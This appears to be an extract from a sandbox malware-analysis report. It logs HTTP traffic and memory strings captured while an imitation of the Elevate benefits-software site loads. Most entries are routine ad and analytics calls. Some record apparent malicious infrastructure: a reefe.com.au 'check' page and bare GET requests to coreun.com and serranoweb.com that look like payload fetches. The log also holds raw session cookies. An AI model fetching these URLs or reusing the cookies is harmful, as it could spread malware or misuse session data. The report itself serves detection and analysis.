Source: global traffic HTTP traffic detected: GET /px/li_sync?redirect=https%3A%2F%2Fpx.ads.linkedin.com%2Fcollect%3Fv%3D2%26fmt%3Djs%26pid%3D3682316%26time%3D1749250530194%26li_adsId%3D71ff584c-f69a-4b49-9c70-b622d9cfe41f%26url%3Dhttps%253A%252F%252Fwww.elevate.inc%252F%26tm%3Dgtmv2%26cookiesTest%3Dtrue%26liSync%3Dtrue HTTP/1.1host: www.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: bcookie="v=2&bf7b89c0-f35c-4470-8d60-e42490e31dbb"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749250531:t=1749336931:v=2:sig=AQFtc4yW-KwEQoHJ1IQNpZOSDBCJoZke"cookie: UserMatchHistory=AQKoA-Gem2NZlgAAAZdHdOLRlIqdUIWqwM5eCpkp7-hsOfs6ctmr3zVPTY1ikGtdFYeRmBhbQzqFAwcookie: AnalyticsSyncHistory=AQLyhRptmVl-dgAAAZdHdOLRRlI2O0KL_NFCG-gRHhxc-5OW13w7GiRCuGam8r-zL0lIjSbTwSax9AwmUWlRLwpriority: i
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529836&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz3z_63NIbJ_BEuMxCAbSeBr_ld_ZxLX-dKHc7damxYyS-2gso&random=84112030&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529827&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz6dzJ3_qA7rACDWNFiLJXUQcalFWhUfqZGSZr0ZdNUmqCYJxy&random=1854421802&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: UserMatchHistory=AQKoA-Gem2NZlgAAAZdHdOLRlIqdUIWqwM5eCpkp7-hsOfs6ctmr3zVPTY1ikGtdFYeRmBhbQzqFAwcookie: AnalyticsSyncHistory=AQLyhRptmVl-dgAAAZdHdOLRRlI2O0KL_NFCG-gRHhxc-5OW13w7GiRCuGam8r-zL0lIjSbTwSax9AwmUWlRLwcookie: ar_debug=1cookie: bcookie="v=2&81ef1bcc-26bf-4c20-8b13-fd440b4eb363"cookie: lidc="b=VGST09:s=V:r=V:a=V:p=V:g=3221:u=1:x=1:i=1749250532:t=1749336932:v=2:sig=AQFSewUB2NSph3F4iXCd7msjxoSeAZhD"cookie: __cf_bm=NwKfd91qktyIuEa3KYNGSHzcaBfVGfYu1Y0QH_goKrU-1749250532-1.0.1.1-CZ0Vtnpuk5Zh9nfjE4w4suHKzTMnWqlFcJMb96abSr21J6vwVQEUrEr9RwYmxSG68gs01RmQ75mkaefrzhQxupR9vUeY.GtpOAL7bhk755spriority: i
Source: global traffic HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: UserMatchHistory=AQKoA-Gem2NZlgAAAZdHdOLRlIqdUIWqwM5eCpkp7-hsOfs6ctmr3zVPTY1ikGtdFYeRmBhbQzqFAwcookie: AnalyticsSyncHistory=AQLyhRptmVl-dgAAAZdHdOLRRlI2O0KL_NFCG-gRHhxc-5OW13w7GiRCuGam8r-zL0lIjSbTwSax9AwmUWlRLwcookie: ar_debug=1cookie: bcookie="v=2&81ef1bcc-26bf-4c20-8b13-fd440b4eb363"cookie: lidc="b=VGST09:s=V:r=V:a=V:p=V:g=3221:u=1:x=1:i=1749250532:t=1749336932:v=2:sig=AQFSewUB2NSph3F4iXCd7msjxoSeAZhD"cookie: __cf_bm=NwKfd91qktyIuEa3KYNGSHzcaBfVGfYu1Y0QH_goKrU-1749250532-1.0.1.1-CZ0Vtnpuk5Zh9nfjE4w4suHKzTMnWqlFcJMb96abSr21J6vwVQEUrEr9RwYmxSG68gs01RmQ75mkaefrzhQxupR9vUeY.GtpOAL7bhk755spriority: u=1, i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1997378774:1749248979:04BudNpFxJAJsVptb57CinVOfR6ZD9ct5KPQ32_d-vc/94bb7f6b5a0e3594/lqKpGLpwgiuR79B9ezenbcotLFsnzO6XPZ8ZEj7pQJA-1749250531-1.2.1.1-ekq2wY6AobRExZ7VlAYsMQTsxkvHwgHrZDzxUllcX.1WojuIMEM8i5mRJKS54d9b HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2F&pu=https%3A%2F%2Fwww.elevate.inc%2F&t=AI-Powered+Benefits+Administration+Software+Solutions+%7C+Elevate&cts=1749250532422&vi=2f11d3f62927f5ffaf236e0c5c53f500&nc=true&u=761582.2f11d3f62927f5ffaf236e0c5c53f500.1749250532419.1749250532419.1749250532419.1&b=761582.1.1749250532419&cc=15 HTTP/1.1host: track.hubspot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /c.gif HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rp/DtBjRbkLzLMq5p7jmRn2HOq1lgI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /event/addv3 HTTP/1.1 | host: api.mida.so | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: identity | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /abtest/convertedv3 HTTP/1.1 | host: api.mida.so | user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | accept: */* | sec-fetch-site: none | sec-fetch-mode: cors | sec-fetch-dest: empty | sec-fetch-storage-access: active | accept-encoding: identity | accept-language: en-US,en;q=0.9 | priority: u=1, i
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cFRVyAoUYR539b5&MD=DvvTFl6k HTTP/1.1 | host: slscr.update.microsoft.com | accept: */* | user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | accept-encoding: identity
Source: global traffic HTTP traffic detected: GET /wp-content/d5 HTTP/1.1 | Host: coreun.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /42/504.txt HTTP/1.1 | Host: www.serranoweb.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/hryYQjSSxM60EncpgnftvSF-LTo.js HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1749250591129&AC=4&CPH=23077e13; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=SRCHLANG=de&LUT=1749250591129; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1749250592128&AC=1&CPH=23077e13; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=SRCHLANG=de&LUT=1749250591129; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: unknown HTTP traffic detected:
  POST /init/uuid HTTP/1.1
  host: api.mida.so
  content-length: 348
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  content-type: text/plain
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.elevate.inc
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  referer: https://www.elevate.inc/
  accept-encoding: identity
  accept-language: en-US,en;q=0.9
  priority: u=1, i
Source: global traffic HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Fri, 06 Jun 2025 22:55:40 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 10898
  Connection: close
  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
  cf-mitigated: challenge
  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
  cross-origin-embedder-policy: require-corp
  cross-origin-opener-policy: same-origin
  cross-origin-resource-policy: same-origin
  origin-agent-cluster: ?1
  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  referrer-policy: same-origin
  server-timing: chlray;desc="94bb7fa5a94d2e61"
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:
Source: chromecache_274.1.dr String found in binary or memory: https://fontawesome.com
Source: chromecache_274.1.dr String found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa0ZL7SUc.woff2)
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa1ZL7.woff2)
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa1pL7SUc.woff2)
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa25L7SUc.woff2)
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2JL7SUc.woff2)
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2ZL7SUc.woff2)
Source: chromecache_299.1.dr String found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2pL7SUc.woff2)
Source: powershell.exe, 0000000E.00000002.1550102765.000001CBA563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019150BBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.1613979532.0000019150BBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pesterh
Source: chromecache_325.1.dr String found in binary or memory: https://github.com/atfzl/eslint-plugin-css-modules/pull/82
Source: chromecache_352.1.dr String found in binary or memory: https://github.com/microsoft/clarity
Source: chromecache_298.1.dr String found in binary or memory: https://github.com/vimeo/player.js
Source: powershell.exe, 0000000E.00000002.1550102765.000001CBA68D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019151AE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chromecache_258.1.dr String found in binary or memory: https://google.com/ccm/form-data
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://google.com/pagead/form-data
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion
Source: chromecache_337.1.dr String found in binary or memory: https://gsap.com
Source: chromecache_337.1.dr String found in binary or memory: https://gsap.com/standard-license
Source: chromecache_255.1.dr String found in binary or memory: https://help.vimeo.com/hc/en-us/articles/115015677227-Troubleshoot-player-error-messages
Source: chromecache_259.1.dr String found in binary or memory: https://js-na1.hs-scripts.com/19524073.js
Source: chromecache_284.1.dr String found in binary or memory: https://js.hs-analytics.net/analytics/1749250500000/19524073.js
Source: chromecache_330.1.dr String found in binary or memory: https://js.hs-banner.com/v2
Source: chromecache_284.1.dr String found in binary or memory: https://js.hs-banner.com/v2/19524073/banner.js
Source: chromecache_284.1.dr String found in binary or memory: https://js.hsadspixel.net/fb.js
Source: chromecache_284.1.dr String found in binary or memory: https://js.hscollectedforms.net/collectedforms.js
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://m.youtube.com
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://medium.com/anthemis-insights/why-we-invested-elevate-d5e8da342b4a
Source: powershell.exe, 0000000E.00000002.1554282826.000001CBB55C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1550102765.000001CBA6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1554282826.000001CBB5487000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1616469530.0000019160A07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1616469530.0000019160B47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://pagead2.googlesyndication.com/ccm/collect
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://pagead2.googlesyndication.com/ccm/conversion
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/conversion
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_255.1.dr, chromecache_264.1.dr String found in binary or memory: https://player.vimeo.com/NOTICE.txt
Source: chromecache_304.1.dr String found in binary or memory: https://player.vimeo.com/api/player.js
Source: chromecache_304.1.dr String found in binary or memory: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
Source: chromecache_351.1.dr String found in binary or memory: https://px.ads.linkedin.com/collect?
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://reefe.com.au/ab/elevateinc/check/index.html
Source: chromecache_351.1.dr String found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
Source: chromecache_325.1.dr String found in binary or memory: https://stackoverflow.com/questions/15751012/
Source: chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
